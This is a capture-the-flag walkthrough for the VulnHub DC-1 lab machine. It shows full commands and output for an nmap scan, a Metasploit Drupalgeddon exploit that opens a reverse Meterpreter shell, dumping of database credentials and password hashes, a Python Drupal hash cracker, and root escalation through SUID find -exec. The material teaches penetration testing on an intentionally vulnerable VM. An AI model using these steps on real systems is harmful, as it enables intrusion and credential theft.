VulnHub DC-1

DC-1 is a boot-to-root CTF machine from VulnHub. Working through it brings you a step closer to hacking a real machine: scan the host, exploit a known web application flaw, reuse the credentials you find, and escalate to root.

I have covered every step here with its output and screenshots, which should leave little room for confusion. The writeup looks long because of the screenshots, but the whole box is about a ten-minute job.

Download the VulnHub DC-1 Machine – https://www.vulnhub.com/entry/dc-1,292/

Discover the machine on the network with netdiscover or an nmap range scan.
netdiscover can sweep your whole network, or, if you know which VMware interface the VM is attached to (vmnet0, vmnet1 for Host-Only, vmnet8 for NAT), point it at that interface:
netdiscover -i vmnet8
I added the machine's IP to /etc/hosts under the name dc-1.
Now run an nmap scan to find the open ports, the services behind them and their version numbers.

root@ETHICALHACKX:~# nmap -sSV -p- -T5 -Pn -A dc-1
-sSV combines -sS (TCP SYN scan) with -sV (service and version detection)
-p- scans all 65535 TCP ports
-T5 uses the insane timing template. Do not do this against a production environment: any basic firewall or IDS/IPS will flag it. Use -T3 or lower there.
-Pn skips host discovery, since we already know the host is up
-A is the aggressive scan: OS detection, version detection, default scripts and traceroute (it already implies -sV, so the explicit -sV is redundant but harmless)
dc-1 is the name I put in /etc/hosts for the IP; you can use the IP address directly instead

Now on running the nmap command in terminal the Output is

root@ETHICALHACKX:~# nmap -sSV -p- -T5 -Pn -A dc-1
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-12 11:54 IST
 Nmap scan report for dc-1 (172.16.241.130)
 Host is up (0.00066s latency).
 Not shown: 65531 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
 | ssh-hostkey: 
 |   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
 |   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
 |_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
 80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
 |_http-generator: Drupal 7 (http://drupal.org)
 | http-robots.txt: 36 disallowed entries (15 shown)
 | /includes/ /misc/ /modules/ /profiles/ /scripts/
 | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
 | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
 |_/LICENSE.txt /MAINTAINERS.txt
 |_http-server-header: Apache/2.2.22 (Debian)
 |_http-title: Welcome to Drupal Site | Drupal Site
 111/tcp   open  rpcbind 2-4 (RPC #100000)
 | rpcinfo:
 |   program version   port/proto  service
 |   100000  2,3,4        111/tcp  rpcbind
 |   100000  2,3,4        111/udp  rpcbind
 |   100024  1          40833/udp  status
 |_  100024  1          55465/tcp  status
 55465/tcp open  status  1 (RPC #100024)
 MAC Address: 00:0C:29:8E:EE:70 (VMware)
 Device type: general purpose
 Running: Linux 3.X
 OS CPE: cpe:/o:linux:linux_kernel:3
 OS details: Linux 3.2 - 3.16
 Network Distance: 1 hop
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
 HOP RTT     ADDRESS
 1   0.66 ms dc-1 (172.16.241.130)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds
nmap scan of dc-1

From the nmap result we see Drupal 7 hosted on port 80:
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian)) Running Drupal
111/tcp open rpcbind 2-4 (RPC #100000)

That is a reasonable attack surface, and Drupal is the obvious place to start, so we open the machine's IP in a browser to explore the Drupal 7 site.
We could try some user enumeration on the Drupal login page and hope to get lucky.
Or jump straight to exploits and see what we have in our arsenal against Drupal 7.

Vulnhub DC-1 Drupal 7

In Metasploit we search for Drupal exploits:

search drupal
Search drupal in metasploit

Metasploit returns the list below; we pick one of the exploits and load it with use.

msf5 > search drupal
Matching Modules
 #  Name                                           Disclosure Date  Rank       Check  Description
 -  ----                                           ---------------  ----       -----  -----------
 0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
 1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
 2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
 3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
 4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
 5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
 6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
 7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

Prefer a module ranked excellent, although that is not mandatory.
Here we choose exploit/multi/http/drupal_drupageddon, which abuses the SQL injection in the database layer of Drupal 7.0 to 7.31 (Drupalgeddon, CVE-2014-3704). Note its Check column says No: the module cannot confirm the target is vulnerable before firing.
In msfconsole type use exploit/multi/http/drupal_drupageddon
To see the options this exploit takes, type show options.

msf5 > use exploit/multi/http/drupal_drupageddon
 msf5 exploit(multi/http/drupal_drupageddon) > show options
 Module options (exploit/multi/http/drupal_drupageddon):
 Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][…]
    RHOSTS                      yes       The target address range or CIDR identifier
    RPORT      80               yes       The target port (TCP)
    SSL        false            no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       The target URI of the Drupal installation
    VHOST                       no        HTTP server virtual host
 Exploit target:
 Id  Name
    --  ----
    0   Drupal 7.0 - 7.31 (form-cache PHP injection method)

Set RHOSTS to dc-1 or the machine IP (msf5 accepts rhost as an alias):

msf5 exploit(multi/http/drupal_drupageddon) > set rhost dc-1
 rhost => dc-1

Now we are all set; launch the exploit with run or exploit.

msf5 exploit(multi/http/drupal_drupageddon) > run
 [*] Started reverse TCP handler on 172.16.241.1:4444
 [*] Sending stage (38247 bytes) to 172.16.241.130
 [*] Meterpreter session 1 opened (172.16.241.1:4444 -> 172.16.241.130:34030) at 2019-08-12 12:20:59 +0530
 meterpreter > 

We now have a reverse Meterpreter session. Once on a machine, the first thing to do is find out who you are, because that decides what you are allowed to do. Type getuid:

meterpreter > getuid
 Server username: www-data (33)

We are www-data, the Apache account, so we have exactly what the web server can read and write. Listing the current directory with ls turns up the first flag, flag1.txt:

meterpreter > ls
 Listing: /var/www
 ...
 flag1.txt
 ...

flag1.txt holds a hint pointing at the Drupal configuration file:

meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.

A quick search told me that Drupal's configuration file lives at sites/default/settings.php, relative to the web root:

meterpreter > cd sites/default
 meterpreter > ls
 Listing: /var/www/sites/default
 Mode              Size   Type  Last modified              Name
 ----              ----   ----  -------------              ----
 100644/rw-r--r--  23202  fil   2013-11-21 02:15:59 +0530  default.settings.php
 40775/rwxrwxr-x   4096   dir   2019-02-19 18:40:31 +0530  files
 100444/r--r--r--  15989  fil   2019-02-19 19:18:01 +0530  settings.php

We read settings.php with cat:

meterpreter > cat settings.php
 <?php
 /**
  *
 flag2
 Brute force and dictionary attacks aren't the
 only ways to gain access (and you WILL need access).
 What can you do with these credentials?
 *
 */ 
 $databases = array (
   'default' => 
   array (
     'default' => 
     array (
       'database' => 'drupaldb',
       'username' => 'dbuser',
       'password' => 'R0ck3t',
       'host' => 'localhost',
       'port' => '',
       'driver' => 'mysql',
       'prefix' => '',

The second flag is the comment at the top of the file, and right below it are the username and password for the Drupal database on dc-1. Note the file mode in the listing above: settings.php is world-readable (r--r--r--), and in any case the web server account has to be able to read it, so anyone who gets code execution as www-data gets the database password for free. The flag reads:

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

The database host is localhost and nmap showed no MySQL port, so it is only reachable from the box. We drop from Meterpreter into a system shell and upgrade it to a pseudo-TTY with python, otherwise interactive programs such as the mysql client misbehave:

python -c 'import pty; pty.spawn("/bin/sh")'

Now we browse the Drupal database for anything useful.

meterpreter > shell
Process 3436 created.
Channel 2 created.
python -c 'import pty; pty.spawn("/bin/sh")'
$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 137

Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

So we explore drupaldb further; it may hold usernames and passwords.

mysql> use drupaldb;
 use drupaldb;
 Reading table information for completion of table and column names
 You can turn off this feature to get a quicker startup with -A
 Database changed

We look for something useful in the drupaldb database, such as a users table.

 mysql> show tables;
 show tables;
 +-----------------------------+
 | Tables_in_drupaldb          |
 +-----------------------------+
 | actions                     |
 | authmap                     |
 | batch                       |
 | block                       |
 | block_custom                |
 | block_node_type             |
 | block_role                  |
 | blocked_ips                 |
 | cache                       |
 | cache_block                 |
 | cache_bootstrap             |
 | cache_field                 |
 | cache_filter                |
 | cache_form                  |
 | cache_image                 |
 | cache_menu                  |
 | cache_page                  |
 | cache_path                  |
 | cache_update                |
 | cache_views                 |
 | cache_views_data            |
 | comment                     |
 | ctools_css_cache            |
 | ctools_object_cache         |
 | date_format_locale          |
 | date_format_type            |
 | date_formats                |
 | field_config                |
 | field_config_instance       |
 | field_data_body             |
 | field_data_comment_body     |
 | field_data_field_image      |
 | field_data_field_tags       |
 | field_revision_body         |
 | field_revision_comment_body |
 | field_revision_field_image  |
 | field_revision_field_tags   |
 | file_managed                |
 | file_usage                  |
 | filter                      |
 | filter_format               |
 | flood                       |
 | history                     |
 | image_effects               |
 | image_styles                |
 | menu_custom                 |
 | menu_links                  |
 | menu_router                 |
 | node                        |
 | node_access                 |
 | node_comment_statistics     |
 | node_revision               |
 | node_type                   |
 | queue                       |
 | rdf_mapping                 |
 | registry                    |
 | registry_file               |
 | role                        |
 | role_permission             |
 | search_dataset              |
 | search_index                |
 | search_node_links           |
 | search_total                |
 | semaphore                   |
 | sequences                   |
 | sessions                    |
 | shortcut_set                |
 | shortcut_set_users          |
 | system                      |
 | taxonomy_index              |
 | taxonomy_term_data          |
 | taxonomy_term_hierarchy     |
 | taxonomy_vocabulary         |
 | url_alias                   |
 | users                       |
 | users_roles                 |
 | variable                    |
 | views_display               |
 | views_view                  |
 | watchdog                    |
 +-----------------------------+
 80 rows in set (0.00 sec)

We check the users table if we get anything here.

mysql> select * from users;
 select * from users;
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 | uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 |   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
 |   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1563777450 | 1563777450 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
 |   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
 +-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
 3 rows in set (0.00 sec)

So we have usernames and password hashes. Drupal 7 hashes start with $S$ (salted, iterated SHA-512), which hashcat handles as mode 7900; we crack them with hashcat or any other tool you prefer.

I copied the admin hash into a separate file, hash.txt, and used one of Kali Linux's default wordlists, rockyou.txt. You can find it with locate rockyou.txt.

root@ETHICALHACKX:~# hashcat -m 7900 hash.txt rockyou.txt

Once the hash is cracked we know the admin password: 53cr3t
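hashcat does the heavy lifting, but it helps to know what mode 7900 is actually computing. The Python below is an added example written for this writeup (not the page's code, not Drupal's PHP and not hashcat): it re-implements the Drupal 7 $S$ scheme from includes/password.inc, verifies a candidate against the admin hash pulled from the users table above, and runs a tiny dictionary attack over a constructed wordlist that includes the password reported above.

```python
"""Verify and dictionary-attack Drupal 7 '$S$' password hashes.

Re-implementation of the scheme in Drupal 7's includes/password.inc, written
for this writeup. Layout of a stored hash (the admin hash from the users table):

    $S$ D   vQI6Y600 iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
    |   |   |        '-- phpass-style base64 of the final SHA-512 digest
    |   |   '-- 8-character salt
    |   '-- log2 of the iteration count, as an index into ITOA64 ('D' = 15)
    '-- algorithm tag: SHA-512
The whole string is cut to 55 characters, so only part of the digest is kept.
"""
import hashlib
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55           # DRUPAL_HASH_LENGTH
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

ADMIN_HASH = "$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR"

# Constructed wordlist for the demo; a real run would stream rockyou.txt.
# R0ck3t is the database password from settings.php, a natural reuse guess.
WORDLIST = ["123456", "password", "admin", "drupal", "R0ck3t", "53cr3t"]


def _b64(data: bytes) -> str:
    """Drupal's _password_base64_encode(): 3 bytes -> 4 chars, custom alphabet."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_hash(password: str, setting: str) -> Optional[str]:
    """Recompute a $S$ hash using the 12-char setting prefix of an existing one."""
    setting = setting[:12]
    if len(setting) != 12 or setting[:3] != "$S$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    # One initial round over salt+password, then 2**count_log2 rounds that
    # re-append the password to the previous raw digest (2**15 = 32768 here).
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def check_password(password: str, stored: str) -> bool:
    """What user_check_password() does: rehash with the stored setting, compare."""
    return drupal7_hash(password, stored) == stored


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate that verifies, or None."""
    for candidate in wordlist:
        if check_password(candidate, stored):
            return candidate
    return None


if __name__ == "__main__":
    print("admin ->", crack(ADMIN_HASH, WORDLIST))
```

Because the salt and the iteration count are carried in the hash itself, no per-site secret is needed to attack a dumped users table; 2^15 SHA-512 rounds is what slows each guess down, and a GPU with hashcat -m 7900 is just this loop run in parallel.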

We log in to the Drupal site on dc-1 as admin and look around. Under the Content menu we find the third flag, flag3, which says:

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

The SUID bit makes an executable run with the privileges of the file's owner rather than those of the user who launches it; for root-owned binaries that means root. The capitalised PERMS, FIND and -exec in the hint point at find, so we list the SUID files on the box:

find / -perm -u=s -type f 2>/dev/null
mysql> exit                                 
 exit
 Bye
 $ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /bin/mount
 /bin/ping
 /bin/su
 /bin/ping6
 /bin/umount
 /usr/bin/at
 /usr/bin/chsh
 /usr/bin/passwd
 /usr/bin/newgrp
 /usr/bin/chfn
 /usr/bin/gpasswd
 /usr/bin/procmail
 /usr/bin/find
 /usr/sbin/exim4
 /usr/lib/pt_chown
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /sbin/mount.nfs

/usr/bin/find has the SUID bit set and is owned by root. We are www-data, but find runs with an effective UID of 0, and anything it launches through -exec inherits that. find is not SUID on a stock Debian install and is a well-known shell-escape binary, so this is the intended route to root.

Let's look at the passwd file, always worth a look on a Linux box:

pwd
 /var/www/sites/default
 $ cat /etc/passwd
 cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 statd:x:102:65534::/var/lib/nfs:/bin/false
 messagebus:x:103:107::/var/run/dbus:/bin/false
 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::

Guess what: there is a flag4 entry in the passwd file, with what looks like a password hash. Crack it the same way as before with john or hashcat ($6$ is sha512crypt, hashcat mode 1800).

The flag4 values are altered in the screenshot because I was having fun with the machine.

Now for the final flag. Navigating to /root fails with a permission error, so let's escalate using the SUID find. find needs an existing file or directory as its starting point; -exec then runs the given command once per match, so a single file is enough:

find ethicalhackx -exec "/bin/sh" \;

Check who we are with whoami: root. /bin/sh on this Debian is dash, which keeps the inherited effective UID (bash would drop it unless started with -p).
Let's get the final flag.

whoami 
root
pwd
/tmp
cd ..
cd root
ls
thefinalflag.txt
cat thefinalflag.txt
Well done!!!! Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

That wraps up this VulnHub machine. More CTFs will follow, and each step of every CTF will be covered in detail in its own post.
